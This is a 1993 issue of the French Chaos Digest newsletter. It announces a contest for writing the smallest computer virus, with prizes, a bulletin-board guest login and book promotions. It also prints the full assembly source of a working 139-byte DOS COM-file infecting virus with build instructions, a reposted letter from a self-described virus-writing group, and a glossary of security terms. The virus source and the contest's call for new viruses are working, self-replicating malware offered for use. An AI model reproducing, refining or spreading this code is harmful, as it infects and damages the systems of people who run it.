home *** CD-ROM | disk | FTP | other *** search
- Chaos Digest Mercredi 17 Fevrier 1993 Volume 1 : Numero 9
-
- Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
- Archiviste: Yves-Marie Crabbe
- Co-Redacteurs: Arnaud Bigare, Stephane Briere
-
- TABLE DES MATIERES, #1.09 (17 Fev 1993)
- File 1--Annonce du 1er "International Computer Virus Writing Contest"
- File 2--Exemple d'ecriture d'un CPA sur 139 bytes
- File 3--Un Createur de CPA peut-il etre Patriotique?
- File 4--Glossaire de l'Insecurite Informatique
-
- Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
- available at no cost from jbcondat@attmail.com. The editors may be
- contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at:
- Jean-Bernard Condat, Chaos Computer Club France [CCCF], 47 rue des Rosiers,
- 93400 St-Ouen, France
-
- Issues of Chaos-D can also be found on some French BBS. Back issues of
- ChaosD can be found on the Internet as part of the Computer underground
- Digest archives. They're accessible using anonymous FTP from:
-
- * ftp.eff.org (192.88.144.4) in /pub/cud
- * red.css.itd.umich.edu (141.211.182.91) in /cud
- * halcyon.com (192.135.191.2) in /pub/mirror/cud
- * ftp.ee.mu.oz.au (128.250.77.2) in /pub/text/CuD
- * nic.funet.fi (128.214.6.100) in /pub/doc/cud
-
- CHAOS DIGEST is an open forum dedicated to sharing French information among
- computerists and to the presentation and debate of diverse views. ChaosD
- material may be reprinted for non-profit as long as the source is cited.
- Some authors do copyright their material, and they should be contacted for
- reprint permission. Readers are encouraged to submit reasoned articles in
- French, English or German languages relating to computer culture and
- telecommunications. Articles are preferred to short responses. Please
- avoid quoting previous posts unless absolutely necessary.
-
- DISCLAIMER: The views represented herein do not necessarily represent
- the views of the moderators. Chaos Digest contributors
- assume all responsibility for ensuring that articles
- submitted do not violate copyright protections.
-
- ----------------------------------------------------------------------
-
- Date: Fri Feb 12 18:30:04 GMT 1993
- From: jbcondat@attmail.com (Chaos Computer Club France )
- Subject: File 1--Annonce du 1er "Intl. Computer Virus Writing Contest"
-
-
- W E L C O M E
-
- T O
-
- T H E
-
- F I R S T
-
- * * * * * * * * * * * * * * * * * * * * * * * * * * * *
- * *
- * I N T E R N A T I O N A L *
- * *
- * C O M P U T E R *
- * *
- * V I R U S *
- * *
- * W R I T I N G *
- * *
- * C O N T E S T *
- * *
- * * * * * * * * * * * * * * * * * * * * * * * * * * * *
-
- - 1 9 9 3 -
-
- Final Date For Submissions: APRIL 1, 1993
-
-
- This Contest is Sponsored by:
-
- American Eagle Publications, Inc.
- P. O. Box 41401
- Tucson, AZ 85717 USA
-
- Publisher of The Little Black Book of Computer Viruses
-
- * * * * * * * * * * * * * * * * * * * * * * * * * * * *
- ! DISTRIBUTE THIS FILE ALL OVER THE KNOWN UNIVERSE !
- * * * * * * * * * * * * * * * * * * * * * * * * * * * *
-
- Ok, all you genius hackers out there! Here is a challenge
- for you. Prove your stuff!
-
- This is an INTERNATIONAL contest, and this file is
- being circulated all over the world, so if you want to compete,
- be forewarned, you've got worldwide competition. Only the best
- have a chance in this game.
-
- Still up to the challenge?
-
- Ok, here it is:
-
- I am writing Volume 2 of The Little Black Book of Compter
- Viruses. This is a study of the scientific applications of
- computer viruses, and their use in artificial life research,
- and all of that neat stuff. One of the things I want to discuss
- in the book is the limit on the size of a virus for a given
- level of functionality. So I took the TIMID virus from Volume 1
- and tore it down to the bare minimum. Not good enough. I wrote
- a virus that worked a little differently. I tore that one down
- to the bare minimum. Good enough? Well maybe. But maybe not.
- I have some pretty compact code, but is it the absolute best?
- I'm guessing somebody out there can top it.
-
- Here are the rules:
-
- (1) The object of this game is to write the smallest
- virus you can with the required level of functionality.
-
- (2) The virus must be capable of infecting all COM files
- on the logged drive in the current directory of a PC,
- no matter how many COM files are there. It may infect
- them as quickly or as slowly as you like, so long as
- it can be demonstrated that it will do so in an hour,
- when running the programs in that directory one after
- the other in sequential order.
-
- (3) The virus must recognize itself and avoid re-infecting
- files that have been infected. At most, only one in
- fifty thousand files should get accidently re-infected,
- assuming that the data in unknown COM files is random.
-
- (4) The virus must terminate gracefully if it cannot find a
- file to infect.
-
- (5) The virus must not destroy any of the code in any file
- which it infects. It must allow that code to execute
- properly, or refuse to infect a file.
-
- (6) The virus must be self-contained. It cannot hide
- code in some common location on disk.
-
- (7) The virus must function properly under MS-DOS 5.0 with
- no TSR's resident, and nothing loaded high.
-
- (8) The size will be determined by the larger of (A) the
- number of bytes the virus code itself takes up in
- an infected file, and (B) the largest number of bytes
- the virus adds to a program when it infects it.
-
- The best code I have for a virus that follows these rules right
- now is 139 bytes long. Both source and executable are included
- in the ZIP, named LITTLE.ASM and LITTLE.COM.
-
- In the event of a tie for size, originality and ingenuity of
- the code will break the tie. All judges decisions are final.
-
- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-
- The winner will receive the following:
-
- (1) A $100 CASH REWARD.
-
- (2) Your code will be published in "The Little Black Book
- of Computer Viruses", Volume 2.
-
- (3) I will give you credit for the code and for winning
- the International Virus Contest in the book, using
- either your real name or an alias, your choice,
- published in the book.
-
- (4) Your name will be posted on the MISS bulletin board
- as the contest winner.
-
- (5) A free copy of "The Little Black Book of Computer
- Viruses", Volume 2, and a one year subscription to
- Computer Virus Developments Quarterly ($95 value).
-
- Three honorable mention winners will receive a free copy of
- The Little Black Book of Computer Viruses, Volume 2.
-
- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-
- You may make an entry in two ways:
-
- (1) Mail your entry on a PC format floppy disk to American Eagle
- Publications, Inc., PO Box 41401, Tucson, AZ 85717 USA.
-
- (2) Upload your entry to the M.I.S.S. bulletin board at
- (805)251-0564 in the USA. Log on as GUEST, password VIRUS,
- last 4 digits of phone number 0000, and upload to the CONTEST
- UPLOADS directory.
-
- A valid entry consists of the following items:
-
- (A) Complete source code for a virus, which can be assembled
- using either TASM, MASM, or A86. If you use another assembler
- and don't know if one of the above will work, then send the
- assembler along with the submission. If you do anything tricky
- that we may not understand, you must explain it in comments in
- the assembler source.
-
- (B) A statement of who you are (aliases accepted) and how to
- get in touch with you in case you win the contest. This
- information will be kept strictly confidential, and encrypted
- at all times.
-
- By submitting an entry to the contest, you agree that the
- copyright to your entry will be considered the property of
- American Eagle Publications. The copyright to any losing
- entry will be returned to the owner upon written request.
- In the event that you win or receive honorable mention in the
- contest, the copyright to the code will remain the property
- of American Eagle Publications, Inc.
-
- You may submit your entry encrypted with PGP 2.1 if you
- desire. Use the following public key to encrypt:
-
- -----BEGIN PGP PUBLIC KEY BLOCK-----
- Version: 2.1
-
- mQBNAitZ9w4AAAECAOXJYOsJNavAAWFBRwf4/u0QWMJ9IHj8eajgOfDRdlCNwEBJ
- wMs1vb5GcdJCaeoCgBR3Xxzh6oEo2nrwfru8mqMABRG0CE1BTHVkd2ln
- =P6d4
- -----END PGP PUBLIC KEY BLOCK-----
-
- Go to it!
-
- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
- D O N ' T M I S S O U T ! ! !
-
- Get Your Very Own
-
- International Virus Writing Contest 1993
-
- T-SHIRT
-
- Great fun to wear to your local user's group meeting, or the
- next computer security conference you attend. Sure to get
- people's attention and initiate lots of interesting
- conversation. Specify Small, Medium, or Large.
-
- Only $9.95
-
- from
-
- American Eagle Publications, Inc.
- P.O. Box 41401
- Tucson, AZ 85717
-
- (US Customers please add $3.00 for UPS delivery)
- (Overseas customers please add $7.50 for airmail delivery)
- (Overseas customers please add $3.00 for surface delivery)
- (AZ residents add 5% sales tax)
-
- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
- American Eagle Publications, Inc., gives you first class
- information to learn the ins and outs of viruses. You may
- order any of the following items from American Eagle
- Publications, PO Box 41401, Tucson, AZ 85717. (Shipping is $2.00
- to the US, $7.50 for overseas airmail.) AZ residents add 5%
- sales tax.
-
- The Little Black Book of Computer Viruses, Volume 1,
- by Mark Ludwig. This award-winning book will teach you the
- basics of how viruses work in no-nonsense terms. 192 pgs.,
- $14.95.
-
- The Little Black Book of Computer Viruses Program Disk. All
- of the programs in the book, both source code and executables,
- $15.00.
-
- Computer Virus Developments Quarterly, This takes up where the
- Little Black Book leaves off, providing the reader with
- quarterly updates on viruses and anti-virus technology.
- For the advanced security specialist or programmer. One year
- subscription with diskettes, $75.00 postpaid, overseas airmail
- add $10.00.
-
- Computer Virus Developments Quarterly, current single issue,
- $25.00. (Please inquire as to price and availability of back
- issues)
-
- Technical Note #1: The Pakistani Brain Virus, a complete
- disassembly and explanation. This is one of the first boot
- sector viruses ever written, and the first stealth boot sector
- virus. It hides on floppy disks and inserts the label (c) Brain
- on the disk. 32 page booklet and diskette with assembler source
- and compiled virus, $20.00.
-
- Technical Note #2: The Stoned Virus, a complete disassembly and
- explanation. The Stoned is the world's most successful boot
- sector virus. It infects floppy disks and hard disks. Find out
- what makes it tick. 24 page booklet and diskette with assembler
- source, compiled virus, and detection tool, $20.00.
-
- Technical Note #3: The Jerusalem Virus, a complete disassembly
- and explanation. Jerusalem is an old but highly effective virus
- which hides in memory, and infects every program you try to
- execute. It starts deleting programs on Friday the 13th. Booklet
- and diskette with assembler source and compiled virus, $20.00.
-
- Technical Note #4: How to Write Protect an MFM Hard Disk. The
- only hard-and-fast way to stop viruses from spreading is to
- physically write-protect your disk. This tech note tells you how
- to do it for the older MFM style drives. Some companies
- sell such devices for hundreds of dollars, but this booklet
- will tell you how to do the job for under $20. Complete with
- theory, circuit diagrams, and a circuit board layout. No
- diskette, $12.00.
-
- How to Become a Virus Expert, a 60 minute audio tape by author
- Mark Ludwig tells you how to get hold of the critical information
- you need to protect your computers, and stop relying on some anti-
- virus product developer to spoon-feed you. $10.00.
-
- Wanted: Translators for these works in all languages and outlets
- for these works in all countries. An opportunity for big $$ awaits
- the enterprising person. Please contact us.
-
- +++++++
- No Virus Contest is complete without POLITICAL COMMENT:
-
- Freedom is only free if it is VOLUNTARY. If you live in a
- "democratic" nation that will not allow secession, then you DO
- NOT live in a free country. The democracies of this world are
- learning how to become tyrannies. Support a Secession Ammendment
- for your constitution, before it is too late and you wish you
- had. Secession is the only logical way to short-circuit the trend
- toward big government and tyranny, short of all-out civil war.
- +++++++
-
- ------------------------------
-
- Date: Fri Feb 12 18:30:04 GMT 1993
- From: jbcondat@attmail.com (Chaos Computer Club France )
- Subject: File 2--Exemple d'ecriture d'un CPA sur 139 bytes
-
-
- ;A small (139 byte) virus with minimal required functionality.
-
- ;This Virus for research purposes only. Please do not release!
- ;Please execute it only on a carefully controlled system, and only
- ;if you know what you're doing!
-
- ;An example for
-
-
- ;#######################################################
- ;# THE FIRST INTERNATIONAL VIRUS WRITING CONTEST #
- ;# 1 9 9 3 #
- ;# sponsored by #
- ;# American Eagle Publications, Inc. #
- ;#######################################################
-
-
- ;Assemble this file with TASM 2.0 or higher: "TASM LITTLE;"
- ;Link as "TLINK /T LITTLE;"
-
- ;Basic explanation of how this virus works:
- ;
- ;The virus takes control when the program first starts up. All of its code
- ;is originally located at the start of a COM file that has been infected.
- ;When the virus starts, it takes over a segment 64K above the one where the
- ;program was loaded by DOS. It copies itself up there, and then searches
- ;for an uninfected file. To determine if a file is infected, it checks the
- ;first two bytes to see if they are the same as its first two bytes. It
- ;reads the file into memory right above where it is sitting (at 100H in the
- ;upper segment). If not already infected, it just writes itself plus the
- ;file it infected back out to disk under the same file name. Then it moves
- ;the host in the lower segment back to offset 100H and executes it.
-
-
- .model tiny ;Tiny model to create a COM file
-
- .code
-
- ;DTA definitions
- DTA EQU 0000H ;Disk transfer area
- FSIZE EQU DTA+1AH ;file size location in file search
- FNAME EQU DTA+1EH ;file name location in file search
-
-
- ORG 100H
-
- ;*************************************************************************
- ;The virus starts here.
-
- VIRSTART:
- mov ax,ds
- add ax,1000H
- mov es,ax ;upper segment is this one + 1000H
- mov si,100H ;put virus in the upper segment
- mov di,si ;at offset 100H
- mov cl,BYTE (OFFSET HOST AND 0FFH)
- ;can't code this with TASM
- mov cl,8BH ;we can assume ch=0
- rep movsb ;this will louse the infection up if run
- ;under debug!
- mov ds,ax ;set ds to high segment
- push ds
- mov ax,OFFSET FIND_FILE
- push ax
- retf ;jump to high memory segment
-
- ;Now it's time to find a viable file to infect. We will look for any COM
- ;file and see if the virus is there already.
- FIND_FILE:
- xor dx,dx ;move dta to high segment
- mov ah,1AH ;so we don't trash the command line
- int 21H ;which the host is expecting
- mov dx,OFFSET COMFILE
- mov ch,3FH ;search for any file, no matter what
- ;attribute (note: cx=0 before this instr)
- mov ah,4EH ;DOS search first function
- int 21H
- CHECK_FILE:
- jc ALLDONE ;no COM files to infect
-
- mov dx,FNAME ;first open the file
- mov ax,3D02H ;r/w access open file, since we'll want to write to it
- int 21H
- jc NEXT_FILE ;error opening file - quit and say this
- ;file can't be used
- mov bx,ax ;put file handle in bx, and leave it there
- ;for the duration
-
- mov di,FSIZE
- mov cx,[di] ;get file size for reading into buffer
- mov dx,si ;and read file in at HOST in new segment
- ;(note si=OFFSET HOST)
- mov ah,3FH ;DOS read function
- int 21H
- mov ax,[si] ;si=OFFSET HOST here
- jc NEXT_FILE ;skip file if error reading it
-
- cmp ax,WORD PTR [VIRSTART]
- ;see if infected already
- jnz INFECT_FILE ;nope, go do it
-
- mov ah,3EH ;else close the file
- int 21H ;and fall through to search for another file
-
- NEXT_FILE:
- mov ah,4FH ;look for another file
- int 21H
- jmp SHORT CHECK_FILE ;and go check it out
-
- COMFILE DB '*.COM',0
-
- ;When we get here, we've opened a file successfully, and read it into
- ;memory. In the high segment, the file is set up exactly as it will look
- ;when infected. Thus, to infect, we just rewrite the file from the start,
- ;using the ;image in the high segment.
- INFECT_FILE:
- xor cx,cx
- mov dx,cx ;reset file pointer to start of file
- mov ax,4200H
- int 21H
-
- mov ah,40H
- mov dx,100H
- mov cx,WORD PTR [di] ;adjust size of file for infection
- add cx,OFFSET HOST - 100H
- int 21H ;write infected file
-
- mov ah,3EH ;close the file
- int 21H
-
- ;The infection process is now complete. This routine moves the host
- ;program down so that its code starts at offset 100H, and then transfers
- ;control to it.
- ALLDONE:
- mov ax,ss ;set ds, es to low segment again
- mov ds,ax
- mov es,ax
- push ax ;prep for retf to host
- shr dx,1 ;restore dta to original value
- mov ah,1AH ;for compatibility
- int 21H
- mov di,100H ;prep to move host back to original location
- push di
- mov cx,sp ;move code, but don't trash the stack
- sub cx,si
- mov cx,0FE6FH ;hand code the above to save a byte
- rep movsb ;move code
- retf ;and return to host
-
- ;***************************************************************************
- ;The host program starts here. This one is a dummy that just returns control
- ;to DOS.
-
- HOST:
- mov ax,4C00H ;Terminate, error code = 0
- int 21H
-
- HOST_END:
-
- END VIRSTART
-
- ------------------------------
-
- Date: 29 Jan 93 15:59:00 +0000
- From: ercm20@festival.edinburgh.ac.uk (Sam Wilson )
- Subject: File 3--Un Createur de CPA peut-il etre Patriotique?
- Repost: Virus-L Digest #6.16 (4 Fev 93)
-
-
- The following letter and editorial response appears in the February
- 1993 issue of the UK magazine 'Personal Computer World' under the
- heading "Spreading viruses":
-
- We are a bunch of programmers who, depressed with the lack of
- viruses that have originated in England, have sought to change
- matters. We presently write viruses for the PC, Archimedes and Atari
- ST. We have increased the few viruses written in England by about
- 25, though this number is increasing all the time as our programmers
- churn out more quality computer viruses.
- Although there are many viruses about we hope to dominate the UK
- 'market'. Won't it be nice, though, for England to have at least one
- export?
- Finally, we as an organisation like to stress that, contrary to
- public opinion, we are *not* boring people who wear anoraks, nor are
- we depraved people who were beaten as children and so grew up with a
- hatred of humanity.
- We are highly intelligent and good at programming and are just
- ordinary people. But we are gonna get you soon!
-
-
- ARCV
- (Association of Really Cruel Viruses)
- [And the editor replies:]
-
- You say you're not depraved people? Perhaps you weren't beaten as
- children, but as far as we're concerned you should be beaten as adults.
-
-
- I wish it were the April issue...
-
- Sam Wilson
- Network Services Division
- Computing Services, The University of Edinburgh
- Edinburgh, Scotland, UK
-
- ------------------------------
-
- Date: Fri, 12 Feb 93 23:26:52 +0000
- From: tegra!vail@uunet.UU.NET (Johnathan Vail )
- Subject: File 4--Glossaire de l'Insecurite Informatique
- Repost from: Virus-L Digest #6.26 (16 Feb 1993)
-
-
- ________________________________________________________________________
-
-
- Glossary of Computer Insecurity
-
- Compiled by Johnathan Vail (vail@tegra.com)
- Created by several people on comp.virus newsgroup
-
- ________________________________________________________________________
-
-
- async interrupt (attack) - to exploit system vulnerabilities arising
- from deficiencies in the interrupt management facilities of an
- operating system.
-
-
- back door - This is an undocumented feature added to a product which
- can allow those who know about it to gain access to features that are
- otherwise protected. The original Tempest video game was supposed to
- have a key sequence that would allow the author of the firmware to get
- free games in an arcade. Some military systems are rumored to have
- back doors in their software that prevents their being used against
- the countries that built them.
-
-
- blivet (attack) - A denial-of-service attack performed by hogging
- limited resources that have no access controls (for example, shared
- spool space on a multi-user system). [Classically defined as "ten pounds
- of horsesh*t in a five pound bag"]
-
-
- browsing - Gaining unauthorized read-only access to files.
-
-
- C2 Catch-22 - Refers to the paradox that all federal computers are
- required to be certified to the C2 level of Trust (or better) by 1992
- (especially if they are to be permitted access to a network), yet
- because no C2 certification has ever been performed with the network
- software active, NSA will revoke the certification of any system as
- soon as it is connected to a network. [Also "C2-by-'92 Catch-22".]
-
-
- cascading - To gain additional privileges on a host (or within a
- process) by using those privileges legitimately (if perhaps unwisely)
- granted to casual users.
-
-
- crayola books - A disparaging reference to the "rainbow books",
- commonly used when referring to the upcoming rewrite of NSA's
- technical computer security guidelines.
-
-
- crypt (attack) - Stealing the system password file and looking for
- known encrypted passwords.
-
-
- data diddling - To alter another's data (especially, to do so subtly
- so it will not be detected); a major breach of the hacker ethic.
-
-
- denial-of-service attack - Any method which an intruder might use to injure
- authorized users of a system by making its facilities unavailable. Often
- easier to accomplish than hijacking a privileged account.
-
-
- dictionary (attack) - Trying a dictionary of commonly used or vendor
- installed passwords.
-
-
- Easter Egg - This is a usually benign feature added to a product by
- the programmer without official knowledge or consent. One example of
- the is the 'xyzzy' command in Data General's AOS operating system.
- Another is the "RESIST THE DRAFT" message in an unused sector of Apple
- Logo.
-
-
- ethical hacker - Someone who espouses the view that he/she may
- "ethically" penetrate any computer or network so long as no data is
- altered. [Colloquially among computer security professionals: a dead
- hacker (or one who has ceased hacking).]
-
-
- leapfrog (attack) - Using userid and password information obtained
- illicitly from one host (e.g., downloading a file of account IDs and
- passwords, tapping TELNET, etc.) to compromise another host. Also, to
- TELNET through one or more hosts in order to confuse a trace (standard
- cracker procedure).
-
-
- masquerading - To assume the identity of another user to gain
- unauthorized access to a host or network.
-
-
- mockingbird - Software that intercepts communications (especially
- logon processes) between users and hosts and provides system-like
- responses to the users while obtaining information (especially account
- IDs and passwords).
-
-
- pest - A set of instructions that self-replicates uncontrollably,
- eventually rendering a network or system unusable via a
- blivet attack. [sometimes called "wabbits"]
-
-
- phage - An autonomous program that inserts malicious code into
- other autonomous programs (e.g., a computer worm or probe
- that carries a virus or trojan horse program).
-
-
- polymorphic virus - 1. A virus using variable encryption with a
- variable decryption routine to avoid detection by its
- "signature". V2P6, Whale, Maltese, Amoeba, Russian Mutant
- and PC-Flu 2 are examples. 2. Any virus that changes it's
- behaviour such as infect different types of host or change
- their mode of operation. A virus that infects both .COM and
- .EXE programs as well as boot sectors can be considered
- polymorphic.
-
-
- probe - A non-self-replicating, autonomous program (or set of
- programs) that has the ability to execute indirectly
- through a network or multi-partition computer system
- (e.g., various hacker utilities).
-
-
- rainbow books - NSA's technical computer security guidelines.
- So named because each of the books is published with a
- different color cover. [See "crayola books".]
-
-
- scavenging - To exploit unerased residual data. The controversy with
- the Prodigy [users finding pieces of the their data in the
- STAGE.DAT file] service is an alleged example of this.
-
-
- spoofing - An attack which relies on the inability of users or computer
- systems to verify the identity or location of a communication partner.
- A `mockingbird' spoofs the computer's login sequence to fool a user;
- some cracking software repeatedly spoofs human login actions to fool
- the computer.
-
-
- stealth virus - A type of virus that attempts to hide its existence.
- A common way of doing this on IBM PCs is for the virus to hook
- itself into the BIOS or DOS and trap sector reads and writes that
- might reveal its existence.
-
-
- trapdoor - A method of bypassing a sequence of instructions, often
- some part of the security code (e.g. the computer logon).
-
-
- time bomb - This is code or a program that checks the systems clock in
- order to trigger its active symptoms. The popular legend of the time
- bomb is the programmer that installs one in his employer's computers
- to go off in case he is laid off or fired.
-
-
- trojan (horse) - This is some (usually nasty) code that is added to,
- or in place of, a harmless program. This could include many viruses
- but is usually reserved to describe code that does not replicate
- itself.
-
-
- unknown system-state (attack) - To exploit the conditions that occur
- after a partial or total system crash (e.g., some files remain open
- without an end-of-file condition allowing an intruder to obtain
- unauthorized access to other files by reading beyond the real EOF when
- service is resumed).
-
-
- virus - a piece of code that is executed as part of another program
- and can replicate itself in other programs. The analogy to real
- viruses is pertinent ("a core of nucleic acid, having the ability to
- reproduce only inside a living cell"). Most viruses on PCs really are
- viruses.
-
-
- worm - An autonomous program (or set of programs) that can replicate
- itself, usually over a network. A worm is a complete program by
- itself unlike a virus which is either part of another program or
- requires another program's thread of execution to operate. Robert
- Morris's program, the Internet Worm, is an example of a worm although
- it has been mistakenly identified in the popular media as a virus.
-
- ________________________________________________________________________
-
- _____
- | | Johnathan Vail vail@tegra.com (508) 663-7435
- |Tegra| jv@n1dxg.ampr.org N1DXG@448.625-(WorldNet)
- ----- MEMBER: League for Programming Freedom (league@prep.ai.mit.edu)
-
- ------------------------------
-
- End of Chaos Digest #1.09
- ************************************
-